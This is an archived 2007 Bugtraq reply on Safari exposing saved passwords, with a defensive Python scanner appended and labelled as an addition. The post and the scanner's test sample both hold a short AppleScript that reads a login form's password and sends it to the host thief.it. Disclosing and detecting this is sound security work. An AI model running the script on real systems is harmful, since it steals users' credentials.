Open Source and information security mailing list archives
 
Date: 14 May 2007 22:35:00 -0000
From: poplix@...uasia.org
To: bugtraq@...urityfocus.com
Subject: Re: RE: Apple Safari on MacOSX may reveal user's saved passwords

Mark, you read it correctly and you're right; anyway, a malicious user at your console should not be able to read your passwords. Also note that to steal saved passwords it's sufficient to entice a victim to execute a malicious script like this:

--BOF
tell application "Safari"
	open location "https://www.target.com"
end tell

do shell script "/bin/sleep 10"

tell application "Safari"
	do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
--EOF

I agree with you in saying that the execution of malicious scripts can lead to much more dangerous attacks; anyway, I consider this a vulnerability and I don't know why Apple believes this is the correct behaviour...

many thanks for your comment

-p
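
A defender-side triage check for the script shape quoted in this message, as an added example that is not part of the original post: it flags `do JavaScript` calls addressed to Safari in AppleScript source text and marks those that both read a form field's `.value` and send data off the page. The function name, the regexes and the severity labels are assumptions of this example, and it handles plain-text source only, not compiled `.scpt` files.

```python
import re

# Constructed sample with the same shape as the script quoted in the post.
SAMPLE = '''tell application "Safari"
    open location "https://www.target.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
    do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.loginform.password.value" in document 1
end tell
'''

TELL_RE = re.compile(r'^\s*tell\s+application\s+"Safari"', re.I)
INLINE_RE = re.compile(r'"Safari"\s+to\s', re.I)   # one-line `tell ... to` form
END_RE = re.compile(r'^\s*end\s+tell\b', re.I)
# AppleScript string literal after `do JavaScript` (tolerates \" escapes).
DOJS_RE = re.compile(r'do\s+JavaScript\s+"((?:[^"\\]|\\.)*)"', re.I)
READ_RE = re.compile(r'\.value\b')                 # reads a form field value
SINK_RE = re.compile(r'location(\.href)?\s*=|\.src\s*=|XMLHttpRequest|\.submit\s*\(', re.I)
URL_RE = re.compile(r'https?://[^\s\'"]+', re.I)

def scan_applescript(source):
    """Return one finding per `do JavaScript` call addressed to Safari."""
    findings, in_block = [], False
    for lineno, line in enumerate(source.splitlines(), 1):
        inline = False
        if TELL_RE.match(line):
            inline = bool(INLINE_RE.search(line))
            in_block = in_block or not inline
        elif END_RE.match(line):
            in_block = False
        m = DOJS_RE.search(line)
        if not m or not (in_block or inline):
            continue
        js = m.group(1)
        reads, sends = bool(READ_RE.search(js)), bool(SINK_RE.search(js))
        findings.append({
            "line": lineno,
            "reads_field_value": reads,
            "sends_off_page": sends,
            "urls": URL_RE.findall(js),
            "severity": "high" if reads and sends else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in scan_applescript(SAMPLE):
        print(finding)
```

Nested `tell` blocks are not tracked, so treat a "review" result as a prompt to read the script rather than a verdict.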
